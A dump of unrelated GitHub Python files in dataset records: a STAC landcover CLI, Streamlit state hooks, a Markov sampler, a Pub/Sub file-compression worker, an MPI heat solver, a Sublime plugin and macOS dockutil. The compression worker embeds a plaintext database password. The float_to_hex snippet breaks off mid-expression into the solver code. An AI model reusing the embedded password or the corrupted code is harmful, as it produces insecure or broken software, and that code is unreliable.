help=\"The output directory for the STAC Collection json\",\n )\n @click.option(\n \"-s\",\n \"--source\",\n required=False,\n help=\"Path to an input GeoTiff\",\n default=None,\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata jsonld\",\n default=JSONLD_HREF,\n )\n @click.option(\n \"-t\",\n \"--tile\",\n help=\"Tile the tiff into many smaller files.\",\n is_flag=True,\n default=False,\n )\n def build_full_collection_command(destination: str, source: str,\n metadata: str, tile: bool) -> None:\n \"\"\"Creates a STAC collection with Items and Assets\n\n Args:\n destination (str): Directory used to store the collection json\n source (str, optional): Path to a GeoTIF of the dataset\n metadata (str, optional): Path to a jsonld metadata file - provided by NRCan\n tile (bool, optional): Tile the tiff into many smaller files\n Returns:\n Callable\n \"\"\"\n # Create the COG from a GeoTIFF.\n # If a source TIFF is not provided, it will be downloaded to /tmp.\n # Enabling tiling will result in many smaller COGs.\n create_cog_command_fn(\n destination=destination,\n source=source,\n tile=tile,\n )\n # Create STAC Items for each COG.\n for cog_file in glob(f\"{destination}/*.tif\"):\n create_extent_asset_command_fn(\n destination=destination,\n cog=cog_file,\n metadata=metadata,\n )\n extent_file = os.path.join(\n destination,\n os.path.basename(cog_file).replace(\".tif\", \"_extent.geojson\"),\n )\n create_item_command_fn(\n destination=destination,\n cog=cog_file,\n extent_asset=extent_file,\n metadata=metadata,\n )\n # Create a STAC Collection.\n create_collection_command_fn(\n destination=destination,\n metadata=metadata,\n )\n\n return 
nrcanlandcover\n","repo_name":"stactools-packages/nrcan-landcover","sub_path":"src/stactools/nrcan_landcover/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"46327773773","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 20:25:00 2021\n\n@author: carolineskalla\n\"\"\"\n\ndef test10A15T():\n scores = []\n # scoreSet = set()\n numRuns= 100\n for i in range(numRuns):\n print(\"Run: \", i)\n s = simulation(2, 10, 15, 0.8, 0.1, 0.1)\n scores.append(s)\n #scoreSet.add(s)\n \n print(numRuns, \" Runs\") \n print(\"Scores:\")\n print(scores)\n # print(\"Unique scores: \", scoreSet)\n \n#test10A15T() \n ","repo_name":"Ilsze/ATAFD","sub_path":"Old Code/untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2033268174","text":"import inspect\nfrom typing import Callable, Generic, Optional, Tuple, TypeVar, Union, overload\n\nimport streamlit as st\n\nfrom encord_active.app.common.state import StateKey\n\nT = TypeVar(\"T\")\nReducer = Callable[[T], T]\n\n\ndef create_key():\n frames = inspect.stack()\n frame_keys = [\n f\"{frame.filename}:{frame.function}:{frame.lineno}\" for frame in frames if \"encord_active\" in frame.filename\n ]\n return str(hash(\"&\".join(frame_keys)))\n\n\ndef use_memo(initial: Callable[[], T], key: Optional[str] = None, clearable: bool = True) -> Tuple[T, Callable[[], T]]:\n key = key or create_key()\n scope = st.session_state.setdefault(StateKey.MEMO, {}) if clearable else st.session_state\n\n if key not in scope:\n scope[key] = initial()\n\n def refresh() -> T:\n scope[key] = initial()\n return scope[key]\n\n return scope[key], refresh\n\n\ndef use_lazy_state(initial: Callable[[], T], key: Optional[str] = None):\n key = key or create_key()\n scope = st.session_state.setdefault(StateKey.SCOPED, {})\n\n if key not in scope:\n scope[key] = initial()\n value: T = scope[key]\n\n return UseState(value, key)\n\n\nclass UseState(Generic[T]):\n def __init__(self, initial: T, key: Optional[str] = None, clearable=True) -> None:\n self._initial = initial\n self._key = key or create_key()\n self._scope = StateKey.SCOPED if clearable else StateKey.SCOPED_AND_PERSISTED\n st.session_state.setdefault(self._scope, {}).setdefault(self._key, initial)\n\n @overload\n def set(self, arg: T):\n ...\n\n @overload\n def set(self, arg: Reducer[T]):\n ...\n\n def set(self, arg: Union[T, Reducer[T]]):\n if callable(arg):\n new_value = arg(st.session_state[self._scope][self._key])\n else:\n new_value = arg\n\n if new_value == self.value:\n return\n\n st.session_state.setdefault(self._scope, {})[self._key] = new_value\n\n @property\n def value(self) -> T:\n return st.session_state.get(self._scope, {}).get(self._key, self._initial)\n","repo_name":"harry-esmart/encord-active","sub_path":"src/encord_active/app/common/state_hooks.py","file_name":"state_hooks.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"715636118","text":"import random\nimport sys\n\nfrom histogram import read_file, histogram_dictonary\n\n\n\n#create the sample list\n\n\ndef better_words(count, token_count, histogram):\n\n #get total number of words from selection\n sentence = \"\"\n while count > 0:\n #choose a random number in that 
range.\n rand_value = random.randint(0, token_count - 1)\n #keeps track of value\n total_count = 0\n\n #loop through list and add values to total count\n for key, value in histogram.items():\n\n if rand_value <= total_count:\n sentence += f\" {key}\"\n break\n\n total_count += value\n #decrement count\n count -= 1\n\n return sentence\n\n\n\n#choose word from list a certain count of times\ndef choose_words(count, words_list):\n count_list = list()\n count_histogram = dict()\n\n for i in range(count):\n count_list.append(random.choice(words_list))\n\n #add the list of word counts to dictonary\n for word in count_list:\n count_histogram[word] = count_histogram.get(word, 0) + 1\n\n return count_histogram\n\n\n\n\nif __name__ == \"__main__\":\n\n file_name = sys.argv[1]\n\n words = read_file(file_name)\n\n token_count = len(words)\n\n hist = histogram_dictonary(words)\n\n sentence = better_words(10, token_count, hist)\n\n print(sentence)\n","repo_name":"KingGenius5/Marxist-Markov","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22618081607","text":"from google.cloud import storage\nfrom google.cloud import pubsub_v1\nimport os\nimport shutil\nimport zipfile\nimport py7zr\nimport tarfile\nimport datetime\nfrom sqlalchemy import create_engine, Column, Integer, String, DateTime, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, declarative_base\n\nengine = create_engine('postgresql://postgres:contrasena123@/baseapp')\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n\nproject_id = \"\"\nsubscription_name = \"\"\nstorage_client = storage.Client()\nsubscriber = pubsub_v1.SubscriberClient()\nsubscription_path = subscriber.subscription_path(project_id, subscription_name)\n\nclass Tareas(Base):\n __tablename__ = 'tareas'\n id = Column(Integer, primary_key=True)\n timeStamp = Column(DateTime, default=datetime.datetime.utcnow)\n fileName = Column(String(500))\n newFormat = Column(String(100))\n status = Column(String(50))\n usuario = Column(Integer, ForeignKey('usuario.id'))\n \nclass Usuario(Base):\n __tablename__ = 'usuario'\n id = Column(Integer, primary_key=True)\n username = Column(String(50), unique=True)\n password = Column(String(100)) \n email = Column(String(100), unique=True)\n\ndef callback(message):\n tarea_id = message.data.decode(\"utf-8\")\n message.ack()\n \n print(f'START PROCESING... task with id {tarea_id}')\n tarea = session.get(Tareas, tarea_id)\n if tarea is None:\n return\n file_name = tarea.fileName\n new_format = tarea.newFormat\n if not os.path.exists('microservicio_worker/archivos/convertidos'):\n os.makedirs('microservicio_worker/archivos/convertidos')\n if not os.path.exists('microservicio_worker/archivos/originales'):\n os.makedirs('microservicio_worker/archivos/originales')\n \n try:\n print(f'DOWNLOADING... {file_name} from bucket')\n bucket_name = ''\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob('archivos/originales/{}'.format(file_name))\n blob.download_to_filename('microservicio_worker/archivos/originales/{}'.format(file_name))\n if new_format == 'ZIP':\n print(f'COMPRESSING... 
{file_name} to zip')\n            file_path = os.path.join('microservicio_worker/archivos/originales', file_name)\n            zip_file_path = os.path.join('microservicio_worker/archivos/convertidos', file_name + '.zip')\n            with zipfile.ZipFile(zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zip_file:\n                zip_file.write(file_path, file_name)\n            blob = bucket.blob(f'archivos/convertidos/{file_name}.zip')\n            print(f'UPLOADING... {file_name}.zip to bucket') \n            blob.upload_from_filename(zip_file_path)\n        elif new_format == '7Z':\n            print(f'COMPRESSING... {file_name} to 7z')\n            file_path = os.path.join('microservicio_worker/archivos/originales', file_name)\n            seven_zip_file_path = os.path.join('microservicio_worker/archivos/convertidos', file_name + '.7z')\n            with py7zr.SevenZipFile(seven_zip_file_path, 'w') as seven_zip_file:\n                seven_zip_file.write(file_path, file_name)\n            print(f'UPLOADING... {file_name}.7z to bucket') \n            blob = bucket.blob(f'archivos/convertidos/{file_name}.7z')\n            blob.upload_from_filename(seven_zip_file_path)\n        elif new_format == 'TAR.GZ':\n            print(f'COMPRESSING... {file_name} to tar.gz')\n            file_path = os.path.join('microservicio_worker/archivos/originales', file_name)\n            tar_gz_file_path = os.path.join('microservicio_worker/archivos/convertidos', file_name + '.tar.gz')\n            with tarfile.open(tar_gz_file_path, 'w:gz') as tar_gz_file:\n                tar_gz_file.add(file_path, file_name)\n            print(f'UPLOADING... {file_name}.tar.gz to bucket') \n            blob = bucket.blob(f'archivos/convertidos/{file_name}.tar.gz')\n            blob.upload_from_filename(tar_gz_file_path)\n        else:\n            tarea.status = 'failed'\n            session.commit()\n            return\n        shutil.rmtree('microservicio_worker/archivos')\n        tarea.status = 'processed'\n        session.commit()\n        print(f'FINISH PROCESING... task with id {tarea_id}')\n        print('--------------------o----------------------')\n    except Exception as e:\n        tarea.status = 'failed'\n        session.commit()\n        print(e)\n\nsubscriber.subscribe(subscription_path, callback=callback)\n\nif __name__ == '__main__':\n    Base.metadata.create_all(engine)\n    print('Servicio iniciado, esperando mensajes...')\n    while True:\n        pass\n","repo_name":"jorcasca/misw4204_cloud","sub_path":"Microservicios_Cloud/microservicio_worker/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"47527234126","text":"import sys\nimport os\n\nMAX_NUMBER_SIZE = 30\n\nEXIT_SUCCESS = 0\nEXIT_ERROR = 1\n\n# [COMMAND_START] all commands must be defined here \ndef average(parameters, variables_list):\n    sum = 0\n    for param in parameters:\n        if param in variables_list:\n            sum += variables_list[param] \n        else:\n            raise Exception(\"Error variable not found\")\n\n    print(sum/len(parameters))\n\n    return EXIT_SUCCESS\n\n# [COMMAND_END]\n\ndef parse_command(line, commands_list, variables_list):\n    for command in commands_list:\n        if line.startswith(command):\n            parameters = line[len(command)+1:-1]\n            parameters_list = parameters.split(\",\")\n\n            return commands_list[command](parameters_list, variables_list)\n    \n    return EXIT_ERROR\n\ndef parse_variable(line, variables_list):\n    variable_split = line.split(\"=\")\n    if len(variable_split) == 2:\n        if not variable_split[1].isdigit():\n            raise Exception(\"Error variable not a numeric value\")\n        elif len(variable_split[1]) > MAX_NUMBER_SIZE:\n            raise Exception(\"Error variable value overflow\")\n\n        variables_list[variable_split[0]] = long(variable_split[1])\n        return EXIT_SUCCESS\n\n    return EXIT_ERROR\n\ndef load_commands(commands_list):\n    
commands_list['average'] = average\n\n\ndef read_and_process(filename):\n variable_list = dict()\n command_list = dict()\n\n load_commands(command_list)\n\n ret = EXIT_SUCCESS\n\n if not os.path.exists(filename):\n print(\"Exception opening/reading/closing file\")\n return EXIT_ERROR\n\n\n line_count = 0\n with open(filename) as fp:\n try:\n for line in fp:\n line_count += 1\n line = line.strip()\n line = line.replace(\" \", \"\")\n if parse_variable(line, variable_list) != EXIT_SUCCESS and parse_command(line, command_list, variable_list) != EXIT_SUCCESS:\n raise Exception(\"Error variable or command not valid\") \n\n except Exception as ex:\n print(\"Line:\" + str(line_count) + \":\" + ex.message)\n ret = EXIT_ERROR\n\n return ret","repo_name":"rfribeiro/command-parser-project","sub_path":"command-parser-python/command_parser_python.py","file_name":"command_parser_python.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2656947248","text":"import struct\n\ndef float_to_hex(num):\n num_hex = hex(struct.unpack(' MAX_TEMP_ERROR ) and ( iteration < max_iterations ):\n\n for i in range( 1 , ROWS+1 ):\n for j in range( 1 , COLUMNS+1 ):\n temperature[ i , j ] = 0.25 * ( temperature_last[i+1,j] + temperature_last[i-1,j] +\n temperature_last[i,j+1] + temperature_last[i,j-1] )\n \n dt = 0\n\n for i in range( 1 , ROWS+1 ):\n for j in range( 1 , COLUMNS+1 ):\n dt = max( dt, temperature[i,j] - temperature_last[i,j])\n temperature_last[ i , j ] = temperature [ i , j ]\n\n dt_global=MPI.COMM_WORLD.reduce(dt, op=MPI.MAX, root=0)\n dt_global=MPI.COMM_WORLD.bcast(dt_global, root=0)\n \n #send down\n if (my_pe_num!=lar_pe):\n MPI.COMM_WORLD.send(temperature[ROWS][:], dest=my_pe_num+1, tag=2)\n \n #receive up \n if (my_pe_num!=0):\n temperature_last[0][:] = MPI.COMM_WORLD.recv(source=my_pe_num-1, tag=2)\n \n #send up\n if (my_pe_num!=0):\n MPI.COMM_WORLD.send(temperature[1][:], dest=my_pe_num-1, tag=1)\n \n #receive down\n if (my_pe_num!=lar_pe):\n temperature_last[ROWS+1][:] = MPI.COMM_WORLD.recv(source=my_pe_num+1, tag=1)\n\n iteration += 1\n \n MPI.COMM_WORLD.barrier()\n\n\n#send all the temperature_last to pe_0\nif (my_pe_num!= 0):\n MPI.COMM_WORLD.send(temperature_last, dest=0, tag=0)\n\n\n#concatenate together\nif my_pe_num==0:\n temperature_last=np.array(temperature_last[0:ROWS+1][:])\n \n for i in range(1,lar_pe):\n result=MPI.COMM_WORLD.recv(source=i, tag=0)\n temperature_last=np.concatenate((temperature_last,np.array(result)[1:ROWS+1,:]))\n\n result=MPI.COMM_WORLD.recv(source=lar_pe, tag=0)\n \n temperature_last=np.concatenate((temperature_last,np.array(result)[1:ROWS+2,:]))\n \n time.sleep(1)\n end = time.time()\n\n print(f\"total runtime of the program is {end - begin}\")\n print(f\"total iteration is {iteration}\")\n \n output(temperature_last)\n# plate = np.fromfile(\"plate.out\", dtype=float).reshape((ROWS_Global+2,COLUMNS+2))\n# plt.imshow(plate, norm=matplotlib.colors.LogNorm(0.1,50,clip=True))\n# plt.show()\n\n","repo_name":"tianhanl0/Parallelizing-Laplace-on-steady-state-heat-metal-with-MPI","sub_path":"laplace.py","file_name":"laplace.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22161257624","text":"\"\"\"\nBased off of http://www.sublimetext.com/forum/viewtopic.php?t=8677,\nand I see no license there so AFAIK you need to ask there any time you\neven think about doing 
anything to this source. Or you can just duck\nand hope, like I have.\n\nMy changes are hereby released completely and irrevocably into the\nPublic Domain. THE ORIGINAL CODE MAY NOT BE PUBLIC DOMAIN AND THUS\nTHIS CODE SHOULD NOT BE THOUGHT OF AS PUBLIC DOMAIN.\n\n- Joshua Landau \n\"\"\"\n\nimport sublime, sublime_plugin\n\nclass RunMultipleCommandsCommand(sublime_plugin.TextCommand):\n \"\"\"\n \"args\" for this takes _either_ \"command\" or \"commands\", where\n \"commands\" is a list of what \"command\" takes. \"args\" also takes\n an optional \"times\" parameter, and just runs itself that many\n times.\n\n \"command\" takes either a string (such as \"store_selections\") or\n a dictionary with a \"command\" attribute, an optional \"args\"\n attribute and an optional \"context\" attribute.\n\n In the above, the \"command\" and \"args\" attribute are as expected,\n and the \"context\" attribute is one of \"window\", \"app\" and \"text\".\n \"\"\"\n def run(self, edit, commands=None, command=None, times=1):\n if commands is None:\n commands = [command] if command is not None else []\n\n for _ in range(times):\n for command in commands:\n self.exec_command(command)\n\n\n def exec_command(self, command):\n # Shortcut for simple command described by one string\n if not \"command\" in command:\n if isinstance(command, str):\n command = {\"command\": command}\n\n else:\n raise ValueError(\"No command name provided.\")\n\n args = command.get(\"args\")\n\n contexts = {\"window\": self.view.window(), \"app\": sublime, \"text\": self.view}\n context = contexts[command.get(\"context\", \"text\")]\n\n context.run_command(command[\"command\"], args)\n","repo_name":"guoyu07/EthanDENG","sub_path":"WordPress/Posts/Tools/Sublime_multi_keybindings/run_multiple_commands.py","file_name":"run_multiple_commands.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6703724068","text":"import sys, plistlib, subprocess, os, getopt, re, pipes, tempfile, pwd, logging\nimport platform\n\nimport utils\n\nlog = logging.getLogger()\n\n# default verbose printing to off\nverbose = False\nversion = '2.0.2'\n\n\ndef usage(e=None):\n \"\"\"Displays usage information and error if one occurred\"\"\"\n\n print(\"\"\"usage: %(progname)s -h\nusage: %(progname)s --add | [--label
tab\n %(progname)s --list --homeloc /Volumes/RAID/Homes --allhomes\n\n The following adds Firefox after Safari in the Default User Template without restarting the Dock\n %(progname)s --add /Applications/Firefox.app --after Safari --no-restart '/System/Library/User Template/English.lproj'\n\n The following restarts the dock, usefull after calling multiple --add/remove with --on-restart\n %(progname)s --restart\n\n\nNotes:\n When specifying a relative path like ~/Documents with the --allhomes option, ~/Documents must be quoted like '~/Documents' to get the item relative to each home\n\nBugs:\n Names containing special characters like accent marks will fail\n\n\nContact:\n Send bug reports and comments to kcrwfrd at gmail.\n\"\"\" % dict(progname = os.path.basename(sys.argv[0])))\n if e:\n print(\"\")\n print('Error processing options:', e)\n return 1\n return 0\n\n\ndef verboseOutput(*args):\n \"\"\"Used by verbose option (-v) to send more output to stdout\"\"\"\n if verbose:\n try:\n log.debug(\"verbose:\", args)\n except Exception:\n pass\n\n\ndef dock_util(args):\n \"\"\"Parses options and arguments and performs functions\"\"\"\n # setup our getoput opts and args\n try:\n (optargs, args) = getopt.getopt(args, 'hv', [\"help\", \"version\",\n \"section=\", \"list\", \"find=\", \"add=\", \"move=\", \"replacing=\",\n \"remove=\", \"after=\", \"before=\", \"position=\", \"display=\", \"view=\",\n \"sort=\", \"label=\", \"type=\", \"allhomes\", \"homeloc=\", \"no-restart\", \"restart\", \"hupdock=\"])\n except getopt.GetoptError as e: # if parsing of options fails, display usage and parse error\n return usage(e)\n\n # setup default values\n global verbose\n add_path = None\n remove_labels = []\n find_label = None\n move_label = None\n after_item = None\n before_item = None\n position = None\n add_path = None\n plist_path = None\n list = False\n all_homes = False\n replace_label = None\n section = None\n display_as = None\n show_as = None\n arrangement = None\n tile_type = None\n label_name = None\n home_directories_loc = '/Users'\n restart_dock = True\n explicit_restart = False\n\n for opt, arg in optargs:\n if opt in (\"-h\", \"--help\"):\n usage()\n elif opt == \"-v\":\n verbose = True\n elif opt == \"--version\":\n print(version)\n return 0\n elif opt == \"--add\":\n add_path = arg\n elif opt == \"--replacing\":\n replace_label = arg\n elif opt == \"--move\":\n move_label = arg\n elif opt == \"--find\":\n find_label = arg\n elif opt == \"--remove\":\n remove_labels.append(arg)\n elif opt == \"--after\":\n after_item = arg\n elif opt == \"--before\":\n before_item = arg\n elif opt == \"--position\":\n position = arg\n elif opt == \"--label\":\n label_name = arg\n elif opt == '--sort':\n if arg == 'name':\n arrangement = 1\n elif arg == 'dateadded':\n arrangement = 2\n elif arg == 'datemodified':\n arrangement = 3\n elif arg == 'datecreated':\n arrangement = 4\n elif arg == 'kind':\n arrangement = 5\n else:\n usage('unsupported --sort argument')\n elif opt == '--view':\n if arg == 'fan':\n show_as = 1\n elif arg == 'grid':\n show_as = 2\n elif arg == 'list':\n show_as = 3\n elif arg == 'auto':\n show_as = 0\n else:\n usage('unsupported --view argument')\n elif opt == '--display':\n if arg == 'stack':\n display_as = 0\n elif arg == 'folder':\n display_as = 1\n else:\n usage('unsupported --display argument')\n elif opt == '--type':\n tile_type = arg+'-tile'\n elif opt == '--section':\n section = 'persistent-'+arg\n elif opt == '--list':\n list = True\n elif opt == '--allhomes':\n all_homes = 
True\n elif opt == '--homeloc':\n home_directories_loc = arg\n elif opt == '--no-restart':\n restart_dock = False\n elif opt == '--restart':\n explicit_restart = True\n # for legacy compatibility only\n elif opt == '--hupdock':\n if arg.lower() in (\"false\", \"no\", \"off\", \"0\"):\n restart_dock = False\n\n # check for an action\n if add_path is None and not remove_labels and move_label is None and find_label is None and list == False and explicit_restart == False:\n usage('no action was specified')\n\n if explicit_restart:\n restart_the_dock()\n return 0\n\n # get the list of plists to process\n # if allhomes option was set, get a list of home directories in the homedirectory location\n if all_homes:\n possible_homes = os.listdir(home_directories_loc)\n plist_paths = [ home_directories_loc+'/'+home+'/Library/Preferences/com.apple.dock.plist' for home in possible_homes if os.path.exists(home_directories_loc+'/'+home+'/Library/Preferences/com.apple.dock.plist') and os.path.exists(home_directories_loc+'/'+home+'/Desktop')]\n else: # allhomes was not specified\n # if no plist argument, then use the user's home directory dock plist, otherwise use the arguments provided\n if not args:\n plist_paths = [ os.path.expanduser('~/Library/Preferences/com.apple.dock.plist') ]\n else:\n plist_paths = args\n # exit if we couldn't find any plists to process\n if len(plist_paths) < 1:\n print('no dock plists were found')\n return 1\n\n # loop over plist paths\n for plist_path in plist_paths:\n\n verboseOutput('processing', plist_path)\n # a home directory is allowed as an argument, so if the plist_path is a\n # directory, we append the relative path to the plist\n if os.path.isdir(plist_path):\n plist_path = os.path.join(plist_path,'Library/Preferences/com.apple.dock.plist')\n\n # verify that the plist exists at the given path\n # and expand and quote it for use when shelling out\n if os.path.exists(os.path.expanduser(plist_path)):\n plist_path = os.path.expanduser(plist_path)\n plist_path = os.path.abspath(plist_path)\n plist_path = pipes.quote(plist_path)\n else:\n print(plist_path, 'does not seem to be a home directory or a dock plist')\n return 1\n\n # check for each action and process accordingly\n if remove_labels: # --remove action(s)\n pl = readPlist(plist_path)\n changed = False\n for remove_label in remove_labels:\n if removeItem(pl, remove_label):\n changed = True\n else:\n print('item', remove_label, 'was not found in', plist_path)\n if changed:\n commitPlist(pl, plist_path, restart_dock)\n elif list: # --list action\n pl = readPlist(plist_path)\n # print a tab separated line for each item in the plist\n # for each section\n for section in ['persistent-apps', 'persistent-others']:\n # for item in section\n for item in pl[section]:\n try:\n # join and print relevant data into a string separated by tabs\n print('\\t'.join((item['tile-data']['file-label'], item['tile-data']['file-data']['_CFURLString'], section, plist_path)))\n except Exception:\n pass\n\n elif find_label is not None: # --find action\n # since we are only reading the plist, make a copy before converting it to be read\n pl = readPlist(plist_path)\n # set found state\n item_found = False\n # loop through dock items looking for a match with provided find_label\n for section in ['persistent-apps', 'persistent-others']:\n for item_offset in range(len(pl[section])):\n try:\n if pl[section][item_offset]['tile-data']['file-label'] == find_label:\n item_found = True\n print(find_label, \"was found in\", section, \"at slot\", 
item_offset+1, \"in\", plist_path)\n except Exception:\n pass\n if not item_found:\n print(find_label, \"was not found in\", plist_path)\n if not all_homes: # only exit non-zero if we aren't processing all homes, because for allhomes, exit status for find would be irrelevant\n return 1\n\n elif move_label is not None: # --move action\n pl = readPlist(plist_path)\n # check for a position option before processing\n if position is None and before_item is None and after_item is None:\n usage('move action requires a position destination')\n # perform the move and save the plist if it was successful\n if moveItem(pl, move_label, position, before_item, after_item):\n commitPlist(pl, plist_path, restart_dock)\n else:\n print('move failed for', move_label, 'in', plist_path)\n\n elif add_path is not None: # --add action\n if add_path.startswith('~'): # we've got a relative path and relative paths need to be processed by using a path relative to this home directory\n real_add_path = re.sub('^~', plist_path.replace('/Library/Preferences/com.apple.dock.plist',''), add_path) # swap out the full home path for the ~\n else:\n real_add_path = add_path\n # determine smart default values where possible\n if section is None:\n if real_add_path.endswith('.app') or real_add_path.endswith('.app/'): # we've got an application\n section = 'persistent-apps'\n elif display_as is not None or show_as is not None or arrangement is not None: # we've got a folder\n section = 'persistent-others'\n\n if tile_type is None: # if type was not specified, we try to figure that out using the filesystem\n if os.path.isdir(real_add_path) and section != 'persistent-apps': # app bundles are directories too\n tile_type = 'directory-tile'\n elif re.match('\\w*://', real_add_path): # regex to determine a url in the form xyz://abcdef.adsf.com/adsf\n tile_type = 'url-tile'\n section = 'persistent-others'\n else:\n tile_type = 'file-tile'\n\n if section is None:\n section = 'persistent-others'\n\n if tile_type != 'url-tile': # paths can't be relative in dock items\n real_add_path = os.path.realpath(real_add_path)\n\n pl = readPlist(plist_path)\n verboseOutput('adding', real_add_path)\n # perform the add save the plist if it was successful\n if addItem(pl, real_add_path, replace_label, position, before_item, after_item, section, display_as, show_as, arrangement, tile_type, label_name):\n commitPlist(pl, plist_path, restart_dock)\n else:\n print('item', add_path, 'was not added to Dock')\n if not all_homes: # only exit non-zero if we aren't processing all homes, because for allhomes, exit status for add would be irrelevant\n return 1\n return 0\n\n# NOTE on use of defaults\n# We use defaults because it knows how to handle cfpreferences caching even when given a path rather than a domain\n# This allows us to keep using path-based plist specifications rather than domains\n# Preserving path based plists are important for people needing to run this on a non boot volume\n# However if Apple stops using plists or moves the plist path, all of this will break\n# So at that point we will have to change the API so users pass in a defaults domain or user rather than a plist path\ndef writePlist(pl, plist_path):\n \"\"\"writes a plist object down to a file\"\"\"\n # get the unescaped path\n ###plist_path = path_as_string(plist_path)\n # get a tempfile path for writing our plist\n plist_import_path = tempfile.mktemp()\n # Write the plist to our temporary plist for importing because defaults can't import from a pipe (yet)\n plistlib.writePlist(pl, 
plist_import_path)\n    # get original permissions\n    plist_stat = os.stat(plist_path)\n    # If we are running as root, ensure we run as the correct user to update cfprefsd\n    if os.geteuid() == 0:\n        # Running defaults as the user only works if the user exists\n        if valid_uid(plist_stat.st_uid):\n            subprocess.Popen(['sudo', '-u', '#%d' % plist_stat.st_uid, '-g', '#%d' % plist_stat.st_gid, 'defaults', 'import', plist_path, plist_import_path])\n        else:\n            subprocess.Popen(['defaults', 'import', plist_path, plist_import_path])\n            os.chown(plist_path, plist_stat.st_uid, plist_stat.st_gid)\n            os.chmod(plist_path, plist_stat.st_mode)\n    else:\n        subprocess.Popen(['defaults', 'import', plist_path, plist_import_path])\n\n\ndef valid_uid(uid):\n    \"\"\"returns bool of whether uid can be resolved to a user\"\"\"\n    try:\n        pwd.getpwuid(uid)\n        return True\n    except Exception:\n        return False\n\n\ndef getOsxVersion():\n    \"\"\"returns a tuple with the (major,minor,revision) numbers\"\"\"\n    # OS X Yosemite returns 10.10, so we will be happy with len(...) == 2, then add 0 for last number\n    try:\n        mac_ver = tuple(int(n) for n in platform.mac_ver()[0].split('.'))\n        assert 2 <= len(mac_ver) <= 3, f\"Bad mac_ver format {mac_ver}\"\n    except Exception as e:\n        raise e\n    if len(mac_ver) == 2:\n        mac_ver = mac_ver + (0, )\n    return mac_ver\n\n\ndef readPlist(plist_path):\n    \"\"\"returns a plist object read from a file path\"\"\"\n    # get the unescaped path\n    ###plist_path = path_as_string(plist_path)\n    # get a tempfile path for exporting our defaults data\n    export_fifo = tempfile.mktemp()\n    # make a fifo for defaults export in a temp file\n    os.mkfifo(export_fifo)\n    # export to the fifo\n    osx_version = getOsxVersion()\n    if osx_version[1] >= 9:\n        subprocess.Popen(['defaults', 'export', plist_path, export_fifo]).communicate()\n        # convert the export to xml\n        plist_string = subprocess.Popen(['plutil', '-convert', 'xml1', export_fifo, '-o', '-'], stdout=subprocess.PIPE).stdout.read()\n    else:\n        try:\n            cmd = ['/usr/libexec/PlistBuddy','-x','-c', 'print',plist_path]\n            proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            (plist_string,err) = proc.communicate()\n        except Exception as e:\n            raise e\n    # parse the xml into a dictionary\n    pl = plistlib.readPlistFromBytes(plist_string)\n    return pl\n\n\ndef path_as_string(path):\n    \"\"\"returns an unescaped string of the path\"\"\"\n    return subprocess.Popen('ls -d '+path, shell=True, stdout=subprocess.PIPE).stdout.read().rstrip('\\n')\n\n\ndef moveItem(pl, move_label=None, position=None, before_item=None, after_item=None):\n    \"\"\"locates an existing dock item and moves it to a new position\"\"\"\n    for section in ['persistent-apps', 'persistent-others']:\n        item_to_move = None\n        # loop over the items looking for the item label\n        for item_offset in range(len(pl[section])):\n            if pl[section][item_offset]['tile-data']['file-label'] == move_label:\n                item_found = True\n                verboseOutput('found', move_label)\n                # make a copy of the found dock entry\n                item_to_move = pl[section][item_offset]\n                found_offset = item_offset\n                break\n            else:\n                verboseOutput('no match for', pl[section][item_offset]['tile-data']['file-label'])\n        # if the item wasn't found, continue to next section loop iteration\n        if item_to_move is None:\n            continue\n        # we are still inside the section for loop\n        # remove the found item\n        pl[section].remove(pl[section][item_offset])\n\n        # figure out where to re-insert the original dock item back into the plist\n        if position is not None:\n            if position in [ 'beginning', 'begin', 'first' 
]:\n pl[section].insert(0, item_to_move)\n return True\n elif position in [ 'end', 'last' ]:\n pl[section].append(item_to_move)\n return True\n elif position in [ 'middle', 'center' ]:\n midpoint = int(len(pl[section])/2)\n pl[section].insert(midpoint, item_to_move)\n return True\n else:\n # if the position integer starts with a + or - , then add or subtract from its current position respectively\n if position.startswith('-') or position.startswith('+'):\n new_position = int(position) + found_offset\n if new_position > len(pl[section]):\n pl[section].append(item_to_move)\n elif new_position < 0:\n pl[section].insert(0, item_to_move)\n else:\n pl[section].insert(int(position) + found_offset, item_to_move)\n return True\n\n try:\n int(position)\n except Exception:\n print('Invalid position', position)\n return False\n pl[section].insert(int(position)-1, item_to_move)\n return True\n elif after_item is not None or before_item is not None:\n # if after or before is set, find the offset of that item and do the insert relative to that offset\n for item_offset in range(len(pl[section])):\n try:\n if after_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == after_item:\n pl[section].insert(item_offset+1, item_to_move)\n return True\n if before_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == before_item:\n pl[section].insert(item_offset, item_to_move)\n return True\n except KeyError:\n pass\n\n return False\n\n\ndef generate_guid():\n 